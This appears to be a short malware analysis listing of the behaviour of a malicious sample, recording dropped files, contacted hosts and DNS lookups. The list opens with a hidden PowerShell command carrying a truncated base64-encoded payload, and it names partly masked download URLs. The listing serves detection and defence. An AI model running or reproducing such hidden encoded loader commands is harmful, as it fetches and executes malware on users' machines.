Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -enco JABCAGoAeQB2AGoAaABvAHUAZgBxAGsAagA9ACcARAB0AHYAbwBpAHIAcQBtAGQAeABnACcAOwAkAFUAZQB5AHYAbgBiAGQAZgBqACAAPQAgACcANwA3ADIAJwA7ACQAVQBmAGQAZQB0AGMAYwBnAHgAPQAnAFQ...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 2004
- %HOMEPATH%\772.exe
- %TEMP%\1079074.cvr
- 'as###metals.com':80
- 'sk##mu.com':443
- 'ma#######descapetheroomgame.com':80
- 'th####uralvalue.eu':80
- 'th####uralvalue.eu':443
- 'pk#.goog':80
- 'jo##hs.net':443
- 'yo######smyartschool.com':80
- http://as###metals.com/wp-content/im24279/
- http://ma#######descapetheroomgame.com/cgi-bin/lj54my449/
- http://th####uralvalue.eu/
- http://pk#.goog/gsr1/gsr1.crt
- http://yo######smyartschool.com/order-wrappers/oj90/
- 'sk##mu.com':443
- 'th####uralvalue.eu':443
- 'jo##hs.net':443
- DNS ASK as###metals.com
- DNS ASK sk##mu.com
- DNS ASK ma#######descapetheroomgame.com
- DNS ASK th####uralvalue.eu
- DNS ASK pk#.goog
- DNS ASK jo##hs.net
- DNS ASK yo######smyartschool.com